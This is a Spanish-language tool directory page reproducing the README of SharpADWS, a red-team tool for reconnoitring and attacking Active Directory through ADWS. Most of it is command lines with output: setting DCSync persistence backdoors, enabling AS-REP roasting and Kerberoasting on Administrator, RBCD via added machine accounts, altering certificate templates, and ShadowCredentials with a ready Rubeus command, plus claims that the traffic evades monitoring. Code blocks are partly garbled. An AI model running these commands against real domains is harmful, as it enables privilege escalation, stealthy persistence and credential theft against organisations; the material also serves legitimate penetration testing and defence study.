Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SharpADWS — Reconocimiento y explotación de Active Directory para Red Teams a través de los Servicios Web de Active Directory (ADWS). | Kitploit
Herramientas/GitHubGitHub/wh0amitz/sharpadws
Escalada de PrivilegiosReconocimientoMecanismos de PersistenciaExplotaciónMovimiento LateralPost-ExplotaciónPruebas de PenetraciónAutenticaciónRed Teaming
GitHubwh0amitz/sharpadws

SharpADWS

Reconocimiento y explotación de Active Directory para Red Teams a través de los Servicios Web de Active Directory (ADWS).

60259hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

SharpADWS

中文文档

Reconocimiento y explotación de Active Directory para equipos rojos a través de los Servicios Web de Active Directory (ADWS).

Resumen

SharpADWS es una herramienta de reconocimiento y explotación de Active Directory para equipos rojos que recopila y modifica datos de Active Directory mediante el protocolo Active Directory Web Services (ADWS).

Normalmente, la enumeración o manipulación de Active Directory se realiza a través del protocolo LDAP. SharpADWS tiene la capacidad de extraer o modificar datos de Active Directory sin comunicarse directamente con el servidor LDAP. Bajo ADWS, las consultas LDAP se encapsulan en una serie de mensajes SOAP y luego se envían al servidor ADWS utilizando un canal cifrado de enlace NET TCP. El servidor ADWS desempaca la consulta LDAP localmente y la reenvía al servidor LDAP que se ejecuta en el mismo controlador de dominio.

Active Directory Web Services (ADWS) se activa automáticamente cuando se instala Active Directory Domain Services (ADDS), lo que hace que SharpADWS sea universal en todos los entornos de dominio.

Ventaja Clave

Uno de los principales beneficios de usar ADWS para la post-explotación de LDAP es que es relativamente desconocido, y dado que el tráfico LDAP no se envía a través de la red, es difícilmente detectado por las herramientas de monitoreo comunes. ADWS ejecuta un servicio completamente diferente al de LDAP, está disponible en el puerto TCP 9389 y utiliza el protocolo SOAP como interfaz.

Durante la investigación de ADWS, notamos que, al ser un servicio web SOAP, la ejecución real de la consulta LDAP se realiza localmente en el controlador de dominio. Esto proporciona una serie de efectos secundarios interesantes que resultan beneficiosos. Por ejemplo, al analizar las consultas LDAP en un controlador de dominio, es posible que observes que las consultas se originan desde los registros de 127.0.0.1, que en muchos casos serán ignorados.

Un beneficio secundario de esto es que la actividad no aparece en DeviceEvents bajo el tipo de acción LDAPSearch, lo que significa que hay muy poca telemetría disponible.

Implementación del Protocolo

SharpADWS implementa los protocolos MS-ADDM, MS-WSTIM y MS-WSDS; puedes usar el código fuente de este proyecto para implementar fácilmente las siguientes operaciones en Active Directory Web Services:

  • Enumerar: Crea un contexto que se asigna al filtro de consulta de búsqueda especificado.
  • Extraer: Recupera el objeto de resultado en el contexto de una enumeración específica.
  • Renovar: Actualiza el tiempo de expiración del contexto de enumeración especificado.
  • ObtenerEstado: Obtiene el tiempo de expiración del contexto de enumeración especificado.
  • Liberar: Libera el contexto de enumeración especificado.
  • Eliminar: Elimina objetos existentes.
  • Obtener: Recupera una o más propiedades de un objeto.
  • Poner: Modifica el contenido de una o más propiedades en un objeto.
    • Agregar: Añade el valor de propiedad especificado al conjunto de valores de la propiedad, o crea la propiedad si aún no existe en el objeto de destino.
    • Reemplazar: Reemplaza el conjunto de valores en la propiedad especificada con los valores indicados en la operación, o crea la propiedad si aún no existe en el objeto de destino. Si no se especifica ningún valor en la operación, se eliminarán todos los valores del atributo actualmente especificado.
    • Eliminar: Elimina el valor de atributo especificado del atributo indicado. Si no se especifica ningún valor, se eliminarán todos los valores. Si la propiedad especificada no existe en el objeto de destino, la solicitud PUT falla.
  • Crear: Crea un nuevo objeto.

Uso

El argumento de línea de comandos -h se puede usar para mostrar la siguiente información de uso:```cmd C:\Users\Marcus>SharpADWS.exe -h

SharpADWS 1.0.0-beta - Copyright (c) 2024 WHOAMI (whoamianony.top)

-h Display this help screen

Connection options: -d Specify domain for enumeration -u Username to use for ADWS Connection -p Password to use for ADWS Connection

Supported methods: Cache Dump all objectSids to cache file for Acl methods Acl Enumerate and analyze DACLs for specified objects, specifically Users, Computers, Groups, Domains, DomainControllers and GPOs DCSync Enumerate all DCSync-capable accounts and can set DCSync backdoors DontReqPreAuth Enumerates all accounts that do not require kerberos preauthentication, and can enable this option for accounts Kerberoastable Enumerates all Kerberoastable accounts, and can write SPNs for accounts AddComputer Add a machine account within the scope of ms-DS-MachineAccountQuota for RBCD attack RBCD Read, write and remove msDS-AllowedToActOnBehalfOfOtherIdentity attributes for Resource-Based Constrained Delegation attack Certify Enumerate all ADCS data like Certify.exe, and can write template attributes Whisker List, add and remove msDS-KeyCredentialLink attribute like Whisker.exe for ShadowCredentials attack FindDelegation Enumerate all delegation relationships for the target domain

Acl options: -dn RFC 2253 DN to base search from -scope Set your Scope, support Base (Default), Onelevel, Subtree -trustee The sAMAccountName of a security principal to check for its effective permissions -right Filter DACL for a specific AD rights -rid Specify a rid value and filter out DACL that security principal's rid is greater than it -user Enumerate DACL for all user objects -computer Enumerate DACL for all computer objects -group Enumerate DACL for all group objects -domain Enumerate DACL for all domain objects -domaincontroller Enumerate DACL for all domain controller objects -gpo Enumerate DACL for all gpo objects

DCSync options: -action [{list, write}] Action to operate on DCSync method list List all accounts with DCSync permissions write Escalate accounts with DCSync permissions -target Specify the sAMAccountName of the account

DontReqPreAuth options: -action [{list, write}] Action to operate on DontReqPreAuth method list List all accounts that do not require kerberos preauthentication write Enable do not require kerberos preauthentication for an account -target Specify the sAMAccountName of the account

Kerberoastable options: -action [{list, write}] Action to operate on Kerberoastable method list List all kerberoastable accounts write Write SPNs for an account to kerberoast -target Specify the sAMAccountName of the account

AddComputer options: -computer-name Name of computer to add, without '$' suffix -computer-pass Password to set for the computer

RBCD options: -action [{read,write,remove}] Action to operate on RBCD method read Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the account write Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the account remove Remove the msDS-AllowedToActOnBehalfOfOtherIdentity attribute value of the account added by the write action

Certify options: -action [{find, modify}] Action to operate on Certify method find Find all CA and certificate templates modify Modify certificate templates -enrolleeSuppliesSubject Enumerate certificate templates with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag for find action, and can enable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag for modify action -clientAuth Enumerate certificate templates with client authentication pKIExtendedKeyUsage for find action, and can enable Client Authentication for modify action

Whisker options: -action [{list, add, remove}] Action to operate on ShadowCredentials method list List all the values of the msDS-KeyCredentialLink attribute for an account add Add a new value to the msDS-KeyCredentialLink attribute for an account remove Remove a value from the msDS-KeyCredentialLink attribute for an account -device-id Specify the DeviceID to remove -target Specify the sAMAccountName of the account

FindDelegation options: No options, just run!

root@kitploit:~
### Cache

Cuando SharpADWS enumera la ACL, para no realizar solicitudes ADWS adicionales por cada objeto de trustee desconocido, es necesario crear un caché completo de todos los objetos de cuenta de antemano mediante el método de caché y guardarlo en un archivo, evitando así un gran número de flujos (innecesarios). El caché contiene una asignación de cada nombre de objeto de cuenta dentro del dominio actual a su objectSid.```cmd
C:\Users\Marcus>SharpADWS.exe Cache

[*] Cache file has been generated: object.cache

Acl

El método Acl puede enumerar el DACL del objeto especificando -dn, y soporta filtrar el DACL enumerado a través de los parámetros -trustee, -right y -rid. Por ejemplo, queremos enumerar todos los objetos de Controlador de Dominio y filtrar el DACL cuyo trustee es Marcus, de la siguiente manera:```cmd C:\Users\Marcus>SharpADWS.exe acl -dn "OU=Domain Controllers,DC=corp,DC=local" -scope Subtree -trustee Marcus

Severity : Critical ObjectDN : CN=DC01,OU=Domain Controllers,DC=corp,DC=local AccessControlType : Allow ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite ObjectType : All Trustee : Marcus IsInherited : False

root@kitploit:~
Para otro ejemplo, queremos enumerar todos los objetos de usuario y filtrar las DACL con permisos GenericWrite y un RID de trustee mayor que 1000, como se muestra a continuación:```cmd
C:\Users\Marcus>SharpADWS.exe acl -dn "CN=Users,DC=corp,DC=local" -scope Subtree -right Generic -rid 1000

 Severity              : Critical
 ObjectDN              : CN=Bob,CN=Users,DC=corp,DC=local
 AccessControlType     : Allow
 ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
 ObjectType            : All
 Trustee               : Marcus
 IsInherited           : False

Además, el método Acl también admite la enumeración de objetos específicos:```cmd SharpADWS.exe acl -user # Enumerate DACL for all user objects SharpADWS.exe acl -computer # Enumerate DACL for all computer objects SharpADWS.exe acl -group # Enumerate DACL for all group objects SharpADWS.exe acl -domain # Enumerate DACL for all domain objects SharpADWS.exe acl -domaincontroller # Enumerate DACL for all domain controller objects SharpADWS.exe acl -gpo # Enumerate DACL for all gpo objects

root@kitploit:~
**Cabe señalar que el uso del método Acl debe basarse en la caché de asignación que se ha establecido mediante el método Cache. **

### DCSync

La acción `list` del método DCSync puede consultar todas las cuentas a las que se les han otorgado los permisos DS-Replication-Get-Changes, DS-Replication-Get-Changes-All y DS-Replication-Get-Changes-In-Filtered-Set, como se muestra a continuación:```cmd
C:\Users\Marcus>SharpADWS.exe DCSync -action list

 Severity              : Info
 ObjectDN              : DC=corp,DC=local
 AccessControlType     : Allow
 ActiveDirectoryRights : ExtendedRight
 ObjectType            : DS-Replication-Get-Changes-All
 Trustee               : Administrators
 IsInherited           : False

 Severity              : Info
 ObjectDN              : DC=corp,DC=local
 AccessControlType     : Allow
 ActiveDirectoryRights : ExtendedRight
 ObjectType            : DS-Replication-Get-Changes-All
 Trustee               : Domain Controllers
 IsInherited           : False

 Severity              : Critical
 ObjectDN              : DC=corp,DC=local
 AccessControlType     : Allow
 ActiveDirectoryRights : ExtendedRight
 ObjectType            : DS-Replication-Get-Changes-All
 Trustee               : Alice
 IsInherited           : False
 

Debe tenerse en cuenta que la acción list del método DCSync debe basarse en la caché de mapeo que se ha establecido a través del método Cache.

Adicionalmente, con permisos suficientes, puedes otorgar permisos DCSync a una cuenta mediante write para establecer una puerta trasera de persistencia en el dominio:```cmd C:\Users\Marcus>SharpADWS.exe DCSync -action write -target Marcus

[*] Account Marcus now has DCSync privieges on the domain.

root@kitploit:~
### DontReqPreAuth

La acción `list` del método DontReqPreAuth puede encontrar todas las cuentas con la opción "No requerir preautenticación de Kerberos" configurada, como se muestra a continuación:```cmd
C:\Users\Marcus>SharpADWS.exe DontReqPreAuth -action list

[*] Found users that do not require kerberos preauthentication:
[*]     CN=Bob,CN=Users,DC=corp,DC=local
[*]     CN=Alice,CN=Users,DC=corp,DC=local
[*]     CN=John,CN=Users,DC=corp,DC=local

Además, puedes abusar de los permisos WriteProperty en la propiedad userAccountControl de la cuenta objetivo habilitando la opción "No requerir preautenticación Kerberos" para esa cuenta mediante la acción write para realizar un ataque AS-REP Roasting:```cmd C:\Users\Marcus>SharpADWS.exe DontReqPreAuth -action write -target Administrator

[*] Set DontReqPreAuth for user Administrator successfully!

root@kitploit:~
### Kerberoastable

La acción `list` del método Kerberoastable puede encontrar todas las cuentas con SPN configurado, como se muestra a continuación:```cmd
C:\Users\Marcus>SharpADWS.exe Kerberoastable -action list

[*] Found kerberoastable users:
[*] CN=krbtgt,CN=Users,DC=corp,DC=local
[*]     kadmin/changepw
[*] CN=Bob,CN=Users,DC=corp,DC=local
[*]     WWW/win-iisserver.corp.local/IIS
[*]     TERMSERV/win-iisserver.corp.local
[*] CN=John,CN=Users,DC=corp,DC=local
[*]     TERMSERV/WIN-SERVER2026

Además, puedes abusar de los permisos WriteProperty en la propiedad servicePrincipalName de la cuenta objetivo para realizar un ataque Kerberoasting añadiendo un SPN a esa cuenta (solo cuentas de usuario) mediante la acción write:```cmd C:\Users\Marcus>SharpADWS.exe Kerberoastable -action write -target Administrator

[*] Kerberoast user Administrator successfully!

root@kitploit:~
### AddComputer

El método AddComputer permite crear una nueva cuenta de equipo dentro del ámbito del valor del atributo `ms-DS-MachineAccountQuota`, que puede utilizarse en ataques RBCD posteriores.```cmd
C:\Users\Marcus>SharpADWS.exe AddComputer -computer-name PENTEST$ -computer-pass Passw0rd

[*] Successfully added machine account PENTEST$ with password Passw0rd.

La acción read del método RBCD puede leer el valor del atributo msDS-AllowedToActOnBehalfOfOtherIdentity del objeto de cuenta especificado para comprobar quién tiene el derecho de delegar recursos a la cuenta, como se muestra a continuación:```cmd C:\Users\Marcus>SharpADWS.exe RBCD -action read -delegate-to DC01$

[] Accounts allowed to act on behalf of other identity: [] WIN-IISSERVER$ (S-1-5-21-1315326963-2851134370-1073178800-1106) [] WIN-MSSQL$ (S-1-5-21-1315326963-2851134370-1073178800-1103) [] WIN-PC8087$ (S-1-5-21-1315326963-2851134370-1073178800-1117)

root@kitploit:~
La acción `write` del método RBCD puede escribir en la propiedad `msDS-AllowedToActOnBehalfOfOtherIdentity` del objeto de cuenta de destino para ataques de Delegación Restringida Basada en Recursos. Como se muestra a continuación, primero creamos una nueva cuenta extrema `PENTEST$` usando el método AddComputer, y luego podemos ejecutar el siguiente comando para escribir el SID de `PENTEST$` en el atributo `msDS-AllowedToActOnBehalfOfOtherIdentity` de `DC01$`:```cmd
C:\Users\Marcus>SharpADWS.exe RBCD -action write -delegate-to DC01$ -delegate-from PENTEST$

[*] Delegation rights modified successfully!
[*] PENTEST$ can now impersonate users on DC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     PENTEST$    (S-1-5-21-1315326963-2851134370-1073178800-1113)

Además, el SID añadido en la acción write se puede eliminar del atributo msDS-AllowedToActOnBehalfOfOtherIdentity del objeto objetivo mediante la acción remove:```cmd C:\Users\Marcus>SharpADWS.exe RBCD -action remove -delegate-to DC01$ -delegate-from PENTEST$

[] Delegation rights modified successfully! [] Accounts allowed to act on behalf of other identity has been removed: [*] PENTEST$ (S-1-5-21-1315326963-2851134370-1073178800-1113)

root@kitploit:~
### Certify

La acción `find` del método Certify puede enumerar los datos en ADCS, incluyendo todas las autoridades de certificación y plantillas de certificado, al igual que [Certify](https://github.com/GhostPack/Certify):```cmd
C:\Users\Marcus>SharpADWS.exe Certify -action find

[*] Find CA and certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'
[*] Listing info about the Enterprise CA 'corp-DC01-CA'

    Enterprise CA Name              : corp-DC01-CA
    DNS Name                        : DC01.corp.local
    FullName                        : DC01.corp.local\corp-DC01-CA
    Certificate Subject             : CN=corp-DC01-CA, DC=corp, DC=local
    Certificate Serial Number       : 2D975C2D49AE4BB7432682E1708C8834
    Certificate Validity Start      : 2/13/2024 5:55:36 PM
    Certificate Validity End        : 2/13/2029 6:05:36 PM
    CA Permissions                  :
         Enrollment Rights          :
                                    : Authenticated Users
         Object Control Permissions :
             ManageCA               :
                                    : Enterprise Admins
                                    : DC01
                                    : Domain Admins
             ManageCertificates     :
                                    : Enterprise Admins
                                    : DC01
             WriteDacl              :
                                    : Enterprise Admins
                                    : DC01
                                    : Domain Admins
             WriteOwner             :
                                    : Enterprise Admins
                                    : DC01
                                    : Domain Admins
             WriteProperty          :
                                    : Enterprise Admins
                                    : DC01
                                    : Domain Admins

[*] Available Certificates Templates

    CA Name                         : CORP-DC01-CA
    Template Name                   : User
    Enabled                         : True
    Client Authentication           : True
    Enrollment Agent                : False
    Any Purpose                     : False
    Enrollee Supplies Subject       : False
    pKIExtendedKeyUsage             : Encrypting File System  Secure Email  Client Authentication
    msPKI-Certificate-Name-Flag     : SUBJECT_ALT_REQUIRE_UPN  SUBJECT_ALT_REQUIRE_EMAIL  SUBJECT_REQUIRE_EMAIL  SUBJECT_REQUIRE_DIRECTORY_PATH
    msPkI-Enrollment-Flag           : INCLUDE_SYMMETRIC_ALGORITHMS  PUBLISH_TO_DS  AUTO_ENROLLMENT
    msPKI-Private-Key-Flag          : EXPORTABLE_KEY
    CA Permissions                  :
         Enrollment Rights          :
                                    : Domain Admins
                                    : Domain Users
                                    : Enterprise Admins
         Object Control Permissions :
             WriteDacl              :
                                    : Domain Admins
                                    : Enterprise Admins
             WriteOwner             :
                                    : Domain Admins
                                    : Enterprise Admins
             WriteProperty          :
                                    : Domain Admins
                                    : Enterprise Admins
                                    : Domain Users

    CA Name                         :
    Template Name                   : UserSignature
    Enabled                         : False
    Client Authentication           : True
    Enrollment Agent                : False
    Any Purpose                     : False
    Enrollee Supplies Subject       : False
    pKIExtendedKeyUsage             : Secure Email  Client Authentication
    msPKI-Certificate-Name-Flag     : SUBJECT_ALT_REQUIRE_UPN  SUBJECT_ALT_REQUIRE_EMAIL  SUBJECT_REQUIRE_EMAIL  SUBJECT_REQUIRE_DIRECTORY_PATH
    msPkI-Enrollment-Flag           : AUTO_ENROLLMENT
    msPKI-Private-Key-Flag          : ATTEST_NONE
    CA Permissions                  :
         Enrollment Rights          :
                                    : Domain Admins
                                    : Domain Users
                                    : Enterprise Admins
         Object Control Permissions :
             WriteDacl              :
                                    : Domain Admins
                                    : Enterprise Admins
             WriteOwner             :
                                    : Domain Admins
                                    : Enterprise Admins
             WriteProperty          :
                                    : Domain Admins
                                    : Enterprise Admins
                                    : Domain Users

# ...

Además, la acción find admite las opciones -enrolleeSuppliesSubject y -clientAuth, que pueden filtrar todas las plantillas de certificados que tienen activada la marca CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT y que admiten la autenticación de cliente:```cmd C:\Users\Marcus>SharpADWS.exe Certify -action find -enrolleeSuppliesSubject -clientAuth

[] Find CA and certificate templates [] Using the search base 'CN=Configuration,DC=corp,DC=local' [*] Listing info about the Enterprise CA 'corp-DC01-CA'

root@kitploit:~
# ...

[*] Available Certificates Templates

root@kitploit:~
CA Name                         : CORP-DC01-CA
Template Name                   : User
Enabled                         : True
Client Authentication           : True
Enrollment Agent                : False
Any Purpose                     : False
Enrollee Supplies Subject       : True
pKIExtendedKeyUsage             : Encrypting File System  Secure Email  Client Authentication
msPKI-Certificate-Name-Flag     : ENROLLEE_SUPPLIES_SUBJECT  SUBJECT_ALT_REQUIRE_UPN  SUBJECT_ALT_REQUIRE_EMAIL  SUBJECT_REQUIRE_EMAIL  SUBJECT_REQUIRE_DIRECTORY_PATH
msPkI-Enrollment-Flag           : INCLUDE_SYMMETRIC_ALGORITHMS  PUBLISH_TO_DS  AUTO_ENROLLMENT
msPKI-Private-Key-Flag          : EXPORTABLE_KEY
CA Permissions                  :
     Enrollment Rights          :
                                : Domain Admins
                                : Domain Users
                                : Enterprise Admins
     Object Control Permissions :
         WriteDacl              :
                                : Domain Admins
                                : Enterprise Admins
         WriteOwner             :
                                : Domain Admins
                                : Enterprise Admins
         WriteProperty          :
                                : Domain Admins
                                : Enterprise Admins
                                : Marcus
                                : Domain Users
                                

...

root@kitploit:~
**Debe tenerse en cuenta que la `find` del método Certify debe depender de la caché de mapeo que se ha establecido a través del método Cache.**

La acción `modify` del método Certify permite modificar las propiedades de la plantilla de certificado, como activar la marca `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` o habilitar la Autenticación de Cliente, si tiene acceso de escritura a la plantilla objetivo:```cmd
C:\Users\Marcus>SharpADWS.exe Certify -action modify -template User -enrolleeSuppliesSubject -clientAuth

[*] Enable enrollee supplies subject for template User successfully!
[*] Enable client authentication for template User successfully!

Whisker

El método Whisker es capaz de realizar el ciclo de vida de un ataque ShadowCredentials al igual que Whisker.

La acción list del método Whisker puede listar el valor del atributo msDS-KeyCredentialLink del objeto de cuenta objetivo:```cmd C:\Users\Marcus>SharpADWS.exe Whisker -action list -target DC01$

[] List deviced for DC01$: [] DeviceID: c9fdae6b-f6a1-4880-a498-6dc89814e596 Creation Time: 2/13/2024 7:43:49 PM [] DeviceID: ee48b31f-71b1-4821-b21e-1ca28fad2ae9 Creation Time: 2/13/2024 8:06:52 PM [] DeviceID: 80c31faf-8b0b-4af6-8350-22de2d91a4fd Creation Time: 2/13/2024 8:01:50 PM

root@kitploit:~
La acción `add` del método Whisker te permite agregar una Key a la propiedad `msDS-KeyCredentialLink` de la cuenta objetivo para realizar un ataque ShadowCredentials si tienes acceso de escritura:```cmd
C:\Users\Marcus>SharpADWS.exe Whisker -action add -target Administrator -cert-pass Passw0rd

[*] Certificate generaged
[*] KeyCredential generated with DeviceID 7d9e0151-5fd2-46d5-ac3d-dce8a71399f2
[*] Updated the msDS-KeyCredentialLink attribute successfully!
[*] You can now run Rubeus with the following syntax:

      Rubeus.exe asktgt /user:Administrator /certificate:MIIJzwIBAzCCCYsGCSqGSIb3DQEHA
      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 /password:"Passw0rd" /domain:cor
      p.local /getcredentials /show

Adicionalmente, con la acción remove puede proporcionar -device-id para eliminar la clave especificada de la propiedad msDS-KeyCredentialLink del objeto de destino:```cmd C:\Users\Marcus>SharpADWS.exe Whisker -action remove -target DC01$ -device-id c9fdae6b-f6a1-4880-a498-6dc89814e596

[] Found value to remove [] msDS-KeyCredentialLink value has been removed: [*] DeviceID: c9fdae6b-f6a1-4880-a498-6dc89814e596 Creation Time: 2/13/2024 7:43:49 PM

root@kitploit:~
### FindDelegation

El método FindDelegation puede enumerar todas las relaciones de delegación en el dominio actual. Este método no tiene opciones o parámetros redundantes:```cmd
C:\Users\Marcus\desktop>SharpADWS.exe FindDelegation

AccountName  AccountType  DelegationType                      DelegationRightsTo
-----------  -----------  ----------------------------------  ----------------------------------------------
DC01$        Computer     Unconstrained                       N/A
PENTEST$     Computer     Resource-Based Constrained          DC01$
WIN-MSSQL$   Computer     Constrained w/ Protocol Transition  ldap/DC01.corp.local/corp.local
WIN-MSSQL$   Computer     Constrained w/ Protocol Transition  ldap/DC01.corp.local
WIN-MSSQL$   Computer     Constrained w/ Protocol Transition  ldap/DC01
WIN-MSSQL$   Computer     Constrained w/ Protocol Transition  ldap/DC01.corp.local/CORP
WIN-MSSQL$   Computer     Constrained w/ Protocol Transition  ldap/DC01/CORP
WIN-MSSQL$   Computer     Constrained w/ Protocol Transition  ldap/DC01.corp.local/DomainDnsZones.corp.local
WIN-MSSQL$   Computer     Constrained w/ Protocol Transition  ldap/DC01.corp.local/ForestDnsZones.corp.local
WIN-PC8087$  Computer     Constrained w/ Protocol Transition  cifs/DC01.corp.local/corp.local
WIN-PC8087$  Computer     Constrained w/ Protocol Transition  cifs/DC01.corp.local
WIN-PC8087$  Computer     Constrained w/ Protocol Transition  cifs/DC01
WIN-PC8087$  Computer     Constrained w/ Protocol Transition  cifs/DC01.corp.local/CORP
WIN-PC8087$  Computer     Constrained w/ Protocol Transition  cifs/DC01/CORP

Para finalizar

Este proyecto ha sido completado por mí de forma independiente, y es inevitable que tenga algunos errores. Los contribuyentes son muy bienvenidos a enviar issues para reportar fallos o proponer nuevas ideas, ¡con el fin de mejorar el proyecto de manera conjunta!

Descargar herramienta